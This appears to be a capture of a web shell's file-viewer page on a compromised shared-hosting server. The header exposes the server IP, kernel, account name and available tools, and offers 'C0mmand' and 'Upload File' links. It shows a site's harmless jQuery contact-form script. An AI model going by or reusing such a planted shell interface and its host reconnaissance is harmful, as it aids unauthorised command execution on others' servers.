Server IP : 103.53.40.154 / Your IP : 3.146.178.81 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/ppcad7no/indiatourbus.com/../nspgurukul.org/../tmp/../bestacservice.co.in/mail/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
$(function () { $("#contactForm input, #contactForm textarea").jqBootstrapValidation({ preventSubmit: true, submitError: function ($form, event, errors) { }, submitSuccess: function ($form, event) { event.preventDefault(); var name = $("input#name").val(); var email = $("input#email").val(); var subject = $("input#subject").val(); var message = $("textarea#message").val(); $this = $("#sendMessageButton"); $this.prop("disabled", true); $.ajax({ url: "contact.php", type: "POST", data: { name: name, email: email, subject: subject, message: message }, cache: false, success: function () { $('#success').html("<div class='alert alert-success'>"); $('#success > .alert-success').html("<button type='button' class='close' data-dismiss='alert' aria-hidden='true'>×") .append("</button>"); $('#success > .alert-success') .append("<strong>Your message has been sent. </strong>"); $('#success > .alert-success') .append('</div>'); $('#contactForm').trigger("reset"); }, error: function () { $('#success').html("<div class='alert alert-danger'>"); $('#success > .alert-danger').html("<button type='button' class='close' data-dismiss='alert' aria-hidden='true'>×") .append("</button>"); $('#success > .alert-danger').append($("<strong>").text("Sorry " + name + ", it seems that our mail server is not responding. Please try again later!")); $('#success > .alert-danger').append('</div>'); $('#contactForm').trigger("reset"); }, complete: function () { setTimeout(function () { $this.prop("disabled", false); }, 1000); } }); }, filter: function () { return $(this).is(":visible"); }, }); $("a[data-toggle=\"tab\"]").click(function (e) { e.preventDefault(); $(this).tab("show"); }); }); $('#name').focus(function () { $('#success').html(''); });